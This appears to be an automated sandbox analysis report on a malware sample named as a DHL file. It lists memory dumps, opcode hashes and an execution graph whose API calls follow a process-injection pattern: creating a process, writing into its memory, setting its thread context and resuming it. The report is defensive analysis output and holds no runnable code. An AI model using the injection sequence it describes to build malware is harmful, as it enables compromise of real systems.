                                                Execution Coverage:10.9%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:158
                                                Total number of Limit Nodes:22

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2975475322.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_5a00000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 2b3a799cbe8d9df2941004ab65c3fd887dc4ff4d213db0fc3de110db8d18f76c
                                                • Instruction ID: d89ca2d88e1bae9e44ab3cece069ac641f0bfecb86139e14b890d4460f8a0521
                                                • Opcode Fuzzy Hash: 2b3a799cbe8d9df2941004ab65c3fd887dc4ff4d213db0fc3de110db8d18f76c
                                                • Instruction Fuzzy Hash: ED8124B0A10B058FD724DF2AE544B9ABBF1FF88304F108A29E496D7B90D775E845CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05A0D1C2
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2975475322.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_5a00000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 91223474a8a85f8906e2904415127a95303e7284e0f6208ecd7185a0191f6e3a
                                                • Instruction ID: 72f6c3576a642f998a09a7078d3cfadea156f6e62eb2e7578d01b354f889ca9c
                                                • Opcode Fuzzy Hash: 91223474a8a85f8906e2904415127a95303e7284e0f6208ecd7185a0191f6e3a
                                                • Instruction Fuzzy Hash: B651F1B1C10249EFCF15CFA9D984ADEBFB6BF48300F14812AE818AB260D7719851CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2976780668.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_62c0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 468bfd03453bcbb542e59ccb262bb3465f8140492b804e27b5804ee2d1a13824
                                                • Instruction ID: 48f85ae5cfa5dad6dbed016a69fc562739c6d360f76292af01c3f734a569014e
                                                • Opcode Fuzzy Hash: 468bfd03453bcbb542e59ccb262bb3465f8140492b804e27b5804ee2d1a13824
                                                • Instruction Fuzzy Hash: 99417772D143968FCB00DFB9C44029EBBF1AF89320F19866AD454A7351DB389844CBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05A0D1C2
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2975475322.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_5a00000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 5d6fc2650e6350baf94e206ffcff7c389bcb793ffa3059309df076611cf07db9
                                                • Instruction ID: 0561dc988110921023455d2dc3fe99938502b541c4059fb9016f21210dd8348c
                                                • Opcode Fuzzy Hash: 5d6fc2650e6350baf94e206ffcff7c389bcb793ffa3059309df076611cf07db9
                                                • Instruction Fuzzy Hash: C051D2B1D10349EFDB14CF99D984ADEBFB5BF48310F24812AE819AB250D775A841CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05A0D1C2
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2975475322.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_5a00000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: eee5963b8f87ce3def68091827a5dc3373508510f032d3fa4fee72b7365ccaca
                                                • Instruction ID: e92bf8540479fab807a92f15711ed5c990bed7fd1202cb56872fbf478e3807a5
                                                • Opcode Fuzzy Hash: eee5963b8f87ce3def68091827a5dc3373508510f032d3fa4fee72b7365ccaca
                                                • Instruction Fuzzy Hash: D741E2B1D10309AFDB14CF99D984ADEBFF5BF48310F24812AE819AB250D774A881CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05A0F8B1
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2975475322.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_5a00000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: bab8c766bc145c9437887e948572365a2a3127a895232876c4ebcc2c81cb1483
                                                • Instruction ID: 298b14c6f88fa0896c30969b939b3da7227323e256f3a437fd6dcc11066988ee
                                                • Opcode Fuzzy Hash: bab8c766bc145c9437887e948572365a2a3127a895232876c4ebcc2c81cb1483
                                                • Instruction Fuzzy Hash: 0A4117B4A10305DFCB14CF99C488EAABBF5FB88314F24C559D519AB361C734A885CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DeleteFileW.KERNELBASE(00000000), ref: 014B73C0
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2931905396.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_14b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: DeleteFile
                                                • String ID:
                                                • API String ID: 4033686569-0
                                                • Opcode ID: 691ea1858222f69610373e6f5eeb7f307a8cf3f283374f1a9c2268fb7bcd95dd
                                                • Instruction ID: 154cc8ee7a879f493cf6214f428e10ffd95817e492a92bd4cd9ce594f8000475
                                                • Opcode Fuzzy Hash: 691ea1858222f69610373e6f5eeb7f307a8cf3f283374f1a9c2268fb7bcd95dd
                                                • Instruction Fuzzy Hash: BB2147B1C0061A9FCB10CF9AC545BDEFBB4FF48320F10812AD818A7250D738A940CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 05A0B38A
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2975475322.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_5a00000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 6cfb8f82378fbdf8f0bf3bb69bbafdce065345ab504b7d862dd7d9ea10eb7047
                                                • Instruction ID: 72cea29c51a0ec7c23a37c7836fec90b0305a6f364fb57d8fe3245c8c1f046cf
                                                • Opcode Fuzzy Hash: 6cfb8f82378fbdf8f0bf3bb69bbafdce065345ab504b7d862dd7d9ea10eb7047
                                                • Instruction Fuzzy Hash: B81137B6D003099FDB10CF9AD544ADEFBF8FB48310F20842AE429A7650C775A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DeleteFileW.KERNELBASE(00000000), ref: 014B73C0
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2931905396.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_14b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: DeleteFile
                                                • String ID:
                                                • API String ID: 4033686569-0
                                                • Opcode ID: 91e6a139e8539e8c8f76bbd99727ec18e9bbf461aa04952ad2d266985143e1c2
                                                • Instruction ID: 241eccd7e3e360b1e46cf30205235e87b8bec62d491df859f38911efad68b996
                                                • Opcode Fuzzy Hash: 91e6a139e8539e8c8f76bbd99727ec18e9bbf461aa04952ad2d266985143e1c2
                                                • Instruction Fuzzy Hash: E91133B1C0065A9BCB14CF9AC585BDEFBB4BB48320F10812AD858A7250D338AA40CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,062CE68A), ref: 062CE777
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2976780668.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_62c0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: 737858b3e0f3944579179bc4370e1f63e683589233447c71791e3b15308746c0
                                                • Instruction ID: a4f41a0c3f2e5d83cca8406fd64f2a75d18b1be6d4f679d55a620139a4d32177
                                                • Opcode Fuzzy Hash: 737858b3e0f3944579179bc4370e1f63e683589233447c71791e3b15308746c0
                                                • Instruction Fuzzy Hash: A91133B1C002599BCB10CF9AC544BAEFBF4AB08320F11822AE818B7241D378A944CFE5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,062CE68A), ref: 062CE777
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2976780668.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_62c0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: 85a12d91735c9d87581b8186f689e063b9e3d386dbcd1a092f901297b17bceb7
                                                • Instruction ID: 5b92251b918a9f190dfa26231c667d62ce0d043bc61555b8ae98faebca4c793c
                                                • Opcode Fuzzy Hash: 85a12d91735c9d87581b8186f689e063b9e3d386dbcd1a092f901297b17bceb7
                                                • Instruction Fuzzy Hash: E51100B1C002599FCB10CF9AD544BEEFBF5AB48320F25826AD858B7251D378A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 05A0B38A
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2975475322.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_5a00000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: da8e15e14ef8d69b18ded822022827f4ff91219b779ad978fb3dafc10ae32361
                                                • Instruction ID: 073d733eda24bae6e3a02d1c67d40220017a252b440c14af2fd6deacb7f29329
                                                • Opcode Fuzzy Hash: da8e15e14ef8d69b18ded822022827f4ff91219b779ad978fb3dafc10ae32361
                                                • Instruction Fuzzy Hash: 831134B6C003088FCB10CF9AD544ADEFBF4FB48310F20842AD419A7650C779A544CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,05A0AEE4), ref: 05A0B11E
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2975475322.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_5a00000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: eb2af81c06a3b34f63ed380a69ec8b46ef1ac6f0af004077cce5d62b6f910265
                                                • Instruction ID: a9afc9081fadfdf4d8a6bf2e3737bba6eafc2a2bd4b62e980e37085b861e9220
                                                • Opcode Fuzzy Hash: eb2af81c06a3b34f63ed380a69ec8b46ef1ac6f0af004077cce5d62b6f910265
                                                • Instruction Fuzzy Hash: 5211F0B5C046498FCB10DF9AD544ADEFBF4AB48324F10842AD829A7250D379A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2930727468.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_139d000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c64e08184619d8e16d7b06fda13f5954f737237df974c6e38fa5f5b4d5678f9f
                                                • Instruction ID: 17550521faeadaa312685234d18cd189b66992312f81ce5bb431398cba16ec9c
                                                • Opcode Fuzzy Hash: c64e08184619d8e16d7b06fda13f5954f737237df974c6e38fa5f5b4d5678f9f
                                                • Instruction Fuzzy Hash: 6D212271604204DFDF15DF68D985B26BFA5FB84358F20C56DD80A4B356C33AD847CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2930727468.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_139d000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction ID: 02a344b8cfe56fcab7e431653ca212d38168679e9881913dceeacf39b1cb2ad9
                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction Fuzzy Hash: 0C119D75504280DFDB16CF58D5C4B16FFA2FB84318F24C6AAD8494B756C33AD44ACBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:11.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:234
                                                Total number of Limit Nodes:18
4c2a20f 40067->40066 40068->40066 40070 4c2a703 40069->40070 40071 4c2a20f 40070->40071 40072 4c27870 WriteProcessMemory 40070->40072 40073 4c2786a WriteProcessMemory 40070->40073 40071->40012 40072->40071 40073->40071 40076 4c27870 WriteProcessMemory 40074->40076 40077 4c2786a WriteProcessMemory 40074->40077 40075 4c2aaeb 40076->40075 40077->40075 40082 4c276d0 Wow64SetThreadContext 40078->40082 40083 4c276d8 Wow64SetThreadContext 40078->40083 40079 4c2a1d3 40080 4c2a753 40079->40080 40084 4c271f0 ResumeThread 40079->40084 40085 4c271ea ResumeThread 40079->40085 40081 4c2a437 40082->40079 40083->40079 40084->40081 40085->40081 40087 4c2a01a 40086->40087 40088 4c29fba 40086->40088 40087->40012 40088->40087 40090 4c27af8 CreateProcessA 40088->40090 40091 4c27aed CreateProcessA 40088->40091 40089 4c2a128 40089->40012 40090->40089 40091->40089 40093 4c2a36e 40092->40093 40095 4c271f0 ResumeThread 40093->40095 40096 4c271ea ResumeThread 40093->40096 40094 4c2a437 40095->40094 40096->40094 40141 4c27960 40097->40141 40145 4c27958 40097->40145 40098 4c2a150 40098->40012 40102 4c2771d Wow64SetThreadContext 40101->40102 40104 4c27765 40102->40104 40104->40035 40106 4c2771d Wow64SetThreadContext 40105->40106 40108 4c27765 40106->40108 40108->40035 40110 4c27230 ResumeThread 40109->40110 40112 4c27261 40110->40112 40112->40040 40114 4c27230 ResumeThread 40113->40114 40116 4c27261 40114->40116 40116->40040 40118 4c277f0 VirtualAllocEx 40117->40118 40120 4c2782d 40118->40120 40120->40045 40122 4c277f0 VirtualAllocEx 40121->40122 40124 4c2782d 40122->40124 40124->40045 40126 4c27b81 40125->40126 40126->40126 40127 4c27ce6 CreateProcessA 40126->40127 40128 4c27d43 40127->40128 40128->40128 40130 4c27af9 CreateProcessA 40129->40130 40132 4c27d43 40130->40132 40134 4c278b8 WriteProcessMemory 40133->40134 40136 4c2790f 40134->40136 40136->40056 40138 4c278b8 WriteProcessMemory 40137->40138 40140 4c2790f 40138->40140 40140->40056 40142 4c279ab ReadProcessMemory 40141->40142 40144 
4c279ef 40142->40144 40144->40098 40146 4c279ab ReadProcessMemory 40145->40146 40148 4c279ef 40146->40148 40148->40098 40149 6d2a608 40153 6d2a640 40149->40153 40157 6d2a630 40149->40157 40150 6d2a627 40154 6d2a649 40153->40154 40161 6d2a678 40154->40161 40155 6d2a66e 40155->40150 40158 6d2a649 40157->40158 40160 6d2a678 DrawTextExW 40158->40160 40159 6d2a66e 40159->40150 40160->40159 40162 6d2a6c3 40161->40162 40163 6d2a6b2 40161->40163 40164 6d2a751 40162->40164 40167 6d2a9b0 40162->40167 40172 6d2a9a1 40162->40172 40163->40155 40164->40155 40168 6d2a9d8 40167->40168 40169 6d2aade 40168->40169 40177 6d2b248 40168->40177 40182 6d2b238 40168->40182 40169->40163 40173 6d2a9b1 40172->40173 40174 6d2aade 40173->40174 40175 6d2b248 DrawTextExW 40173->40175 40176 6d2b238 DrawTextExW 40173->40176 40174->40163 40175->40174 40176->40174 40178 6d2b25e 40177->40178 40187 6d2b6a3 40178->40187 40192 6d2b6b0 40178->40192 40179 6d2b2d4 40179->40169 40183 6d2b25e 40182->40183 40185 6d2b6a3 DrawTextExW 40183->40185 40186 6d2b6b0 DrawTextExW 40183->40186 40184 6d2b2d4 40184->40169 40185->40184 40186->40184 40188 6d2b6ad 40187->40188 40189 6d2b6ce 40188->40189 40196 6d2b6f0 40188->40196 40201 6d2b6e1 40188->40201 40189->40179 40194 6d2b6f0 DrawTextExW 40192->40194 40195 6d2b6e1 DrawTextExW 40192->40195 40193 6d2b6ce 40193->40179 40194->40193 40195->40193 40197 6d2b721 40196->40197 40198 6d2b74e 40197->40198 40206 6d2b770 40197->40206 40211 6d2b760 40197->40211 40198->40189 40202 6d2b721 40201->40202 40203 6d2b74e 40202->40203 40204 6d2b770 DrawTextExW 40202->40204 40205 6d2b760 DrawTextExW 40202->40205 40203->40189 40204->40203 40205->40203 40208 6d2b791 40206->40208 40207 6d2b7a6 40207->40198 40208->40207 40216 6d28fec 40208->40216 40210 6d2b811 40213 6d2b791 40211->40213 40212 6d2b7a6 40212->40198 40213->40212 40214 6d28fec DrawTextExW 40213->40214 40215 6d2b811 40214->40215 40218 6d28ff7 40216->40218 40217 6d2d7e9 40217->40210 40218->40217 40222 6d2e360 40218->40222 40225 6d2e34f 
40218->40225 40219 6d2d8fc 40219->40210 40223 6d2e37d 40222->40223 40228 6d2cdb4 40222->40228 40223->40219 40226 6d2cdb4 DrawTextExW 40225->40226 40227 6d2e37d 40226->40227 40227->40219 40229 6d2e398 DrawTextExW 40228->40229 40231 6d2e43e 40229->40231 40231->40223

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q$Te^q$)"
                                                • API String ID: 0-4031938444
                                                • Opcode ID: 5dae965cdb4928d2f70adc89a391720e0aa2688f1fd29eeb839e72e37bc542f3
                                                • Instruction ID: 6b27735a58006237c840bcfc6a55bdb28d05cd03f6101be41bd8c39e9396797b
                                                • Opcode Fuzzy Hash: 5dae965cdb4928d2f70adc89a391720e0aa2688f1fd29eeb839e72e37bc542f3
                                                • Instruction Fuzzy Hash: 34A14A75E016099FCB08CFA9C9909DEFBF6FF89310F10852AE416AB254D7345906CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q$Te^q$)"
                                                • API String ID: 0-4031938444
                                                • Opcode ID: 8c172183150f41c0f97191ef0cb047fc67e5a210b25b73f209bf89f28f9ab7af
                                                • Instruction ID: d62f5575c3e194692e881ce8bd86e47b041339ca63ba786947f2c25949d0e295
                                                • Opcode Fuzzy Hash: 8c172183150f41c0f97191ef0cb047fc67e5a210b25b73f209bf89f28f9ab7af
                                                • Instruction Fuzzy Hash: 8081C274E006098FDB48CFAAC994AAEFBF2BF89310F14942AD515AB358D7349905CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tIh
                                                • API String ID: 0-443931868
                                                • Opcode ID: 85bf270996e5601cc735acf4795906762ed8c9b43585ba72d4eff4132d02c63a
                                                • Instruction ID: 5019ad3b407a54f8843c641de5a403cdadead24a477874ee11ff1b7c0879b5d7
                                                • Opcode Fuzzy Hash: 85bf270996e5601cc735acf4795906762ed8c9b43585ba72d4eff4132d02c63a
                                                • Instruction Fuzzy Hash: 29E18E71D0920ADFDB44CFA9C6808AEFBB2FF89310B14D559D512EB255D734AA42CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tIh
                                                • API String ID: 0-443931868
                                                • Opcode ID: 0a38d78a1eb17f09e067544c7e090167397a80f5c708218b8737b4887118f845
                                                • Instruction ID: eaee5fc8c2541318c1e357e05b327edba17c81de175a95d505a7d72b7f8d1e93
                                                • Opcode Fuzzy Hash: 0a38d78a1eb17f09e067544c7e090167397a80f5c708218b8737b4887118f845
                                                • Instruction Fuzzy Hash: 07E16C71D0920ADFDB44CFA9C6808AEFBB2FF89310B10D559D512EB255D734AA42CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tIh
                                                • API String ID: 0-443931868
                                                • Opcode ID: 27b1e18b00ec7d5845db4f1c41960f2ea836722764a12334e025f5b717618648
                                                • Instruction ID: f3bda160a2225c4395d71487eb4c8d5a188ca63a392fadc6817c93d544029cae
                                                • Opcode Fuzzy Hash: 27b1e18b00ec7d5845db4f1c41960f2ea836722764a12334e025f5b717618648
                                                • Instruction Fuzzy Hash: 4AD16B71D0920ADFDB44CFA9C6848AEFBB2FF89310B10D559D512EB254D734AA42CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tIh
                                                • API String ID: 0-443931868
                                                • Opcode ID: b3499004b0924a40127f5d1fea7c5f8cad19da24d0541873f53bd7d4d26030c9
                                                • Instruction ID: 128448a5da3347d56b4475f3fd1a4535bb64dbf9dc1f41b68dd14b4d85c4e26f
                                                • Opcode Fuzzy Hash: b3499004b0924a40127f5d1fea7c5f8cad19da24d0541873f53bd7d4d26030c9
                                                • Instruction Fuzzy Hash: A5D12770D0920ADFDB44CFA9C6848AEFBB2FF89310B10D559D516EB294D734AA42CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: 429d6ff1b127242d08127676d6df108dfd183a52e0d497b1bead5d05ae02f306
                                                • Instruction ID: fcb09e27ff4c3b3bfa62315afc6f14263a3aae5d06fe4c187d2bd9da49adad89
                                                • Opcode Fuzzy Hash: 429d6ff1b127242d08127676d6df108dfd183a52e0d497b1bead5d05ae02f306
                                                • Instruction Fuzzy Hash: 42315A71E056189FDB58CFABD95079EFBF7AFC9210F14C0AAE409A7210EB304A518F51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ed127587ecc22b2b9729688ca070be5db97b91a9620cda2613da776d0fe17566
                                                • Instruction ID: 8d4956880aa768ddf80d87894ed44a9508aba93b83f668257456cb6ad6a74cc4
                                                • Opcode Fuzzy Hash: ed127587ecc22b2b9729688ca070be5db97b91a9620cda2613da776d0fe17566
                                                • Instruction Fuzzy Hash: 17A12671E05209EFDB48CFA5D68099DFBB2FB89320F20A41AE016BB228D7749905CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: acdf6cef21acc22af8286b88f1550b35fce9a94549c815dc06691ac654cf2f06
                                                • Instruction ID: 03e02503ba25670cc32ff89d8f6e8d52144e7eaafefecbee9943cd3b84a6b542
                                                • Opcode Fuzzy Hash: acdf6cef21acc22af8286b88f1550b35fce9a94549c815dc06691ac654cf2f06
                                                • Instruction Fuzzy Hash: F3812275E0421ACFDB44CFA9C9409EEFBB2FB89310F10985AD801A7354D7789916CF98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 90190985c1ec070900e1b4dfa207554f1aecc056f298b7dfee53891981a25de7
                                                • Instruction ID: e08a5d5228e3b9f1b9cbcc917f3d30fef412593f3dff5f676d418b5e1a53de9d
                                                • Opcode Fuzzy Hash: 90190985c1ec070900e1b4dfa207554f1aecc056f298b7dfee53891981a25de7
                                                • Instruction Fuzzy Hash: EB81F075E0421ACFDB44CFA9C9809AEFBB2FB89311F10991AD801A7254D7789916CF98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d25a950aa487f9b40d045c298645e5ca13683d3c3cb4f589e0230f694a4b9c03
                                                • Instruction ID: 29eab038ca39cf1c05b56c77e7dea9806efe46fc3f6e305e09733e37496b8451
                                                • Opcode Fuzzy Hash: d25a950aa487f9b40d045c298645e5ca13683d3c3cb4f589e0230f694a4b9c03
                                                • Instruction Fuzzy Hash: AC21F8B1E056598FEB18CFAAC9442DEFBF3EFC9310F14C06AD509AA258DB701A45CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
